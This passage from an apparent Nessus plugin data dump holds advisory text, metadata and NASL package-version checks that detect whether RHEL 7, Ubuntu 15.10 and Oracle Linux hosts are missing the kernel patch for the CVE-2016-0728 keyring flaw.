The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "RHEL 7 : kernel (RHSA-2016:0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory 
RHSA-2016:0064. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88173);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:0064)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0064\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0064\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 
reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:37", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux vulnerability (USN-2872-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2872-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88014", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88014);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-1\");\n\n script_name(english:\"Ubuntu 15.10 : linux vulnerability (USN-2872-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. 
A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:37", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-3509 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. 
(CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2016-3509.NASL", "href": "https://www.tenable.com/plugins/nessus/88032", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3509.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88032);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-3509 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which 
allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-3509.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! 
